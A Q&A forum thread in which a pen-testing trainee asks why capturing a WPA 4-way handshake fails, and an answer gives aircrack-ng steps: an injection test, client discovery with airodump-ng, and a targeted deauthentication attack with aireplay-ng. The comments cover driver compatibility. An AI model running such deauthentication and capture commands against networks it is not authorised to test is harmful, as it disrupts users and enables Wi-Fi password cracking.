1

I am training to be a pen tester and am having some issues obtaining a 4 way handshake. I use airodump-ng -c -w file --bssid wlo1 followed by Aireplay-ng -0 0 -a (Mac) wlo1

Here's all the steps I follow:

Ifconfig wlo1 ifconfig wlo1 down iwconfig wlo1 mode monitor ifconfig wlo1 up airmon-ng check wlo1 kill processes Airodump-ng wlo1 airodump-ng -c (channel) -w (file) --bssid wlo1 aireplay-ng -0 0 -a (mac) wlo1

I know what to do after I get the handshake, I am just stuck. Any help would be greatly appreciated. I am using Fedora 25

Improve this question
1
  • I tried to keep my code nice and neat but it seems to smash it all together. I can send a screenshot if anyone is confused. Thank you! Commented May 27, 2017 at 1:09

1 Answer 1

Reset to default
1

First you have to make sure that your NIC can inject and that the targeted access point is in range.

aireplay-ng -9 wlo1

After running this command you should see 'Injection is working!' , and the targeted AP with a high response rate ( 50 - 100% )

Deauthentication attack sends disassocate packets to connected clients, so you need to have at least one associated client. 

airodump-ng -c <ap channel> --bssid <ap mac> wlo1

There should be at least one MAC under the 'STATION' tab associated with the AP. You can use this client for a targeted attack. 

aireplay-ng -0 5 -a <ap mac> -c <client mac> wlo1

You may have to run the above command several times untill you get a handshake.

You can increase or decrease the number of deauthentication packets. Sometimes one is enough, sometimes it takes ten or more. If you still can't capture a WPA handshake then maybe the issue is with your NIC. Here you'll find a list of compatible drivers, and a patching guide.

Improve this answer
4
  • When I run that injection test I see where it is attempting to broadcast probe requests. After that there's "no answer". It comes back saying found 6 APs but they all come back at 0%. Is there a driver I can download or do I need to get an external wireless card? Commented May 27, 2017 at 19:11
  • That means that your interface can't inject. Are you sure it's wlo1 and not mon0 or wlo1mon ? If you run airmon-ng start wlo1 you will see "monitor mode is enabled on ..." . Use that interface. If you still can't inject, here you'll find a list of compatible drivers : compatibility_drivers , and a patching guide : patching Commented May 27, 2017 at 20:00
  • Yeah it's definitely wlo1. I can see that it's in monitor mode once I switch from promiscuous mode. Thanks for the drivers guide, I really appreciate it!! Commented May 27, 2017 at 21:05
  • Turns out my wireless card is not compatible so I ordered the Alfa-AWUS036H-802-11b-Wireless-network/dp/B002WCEWU8. Thanks for your help Commented May 29, 2017 at 8:36

You must log in to answer this question.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.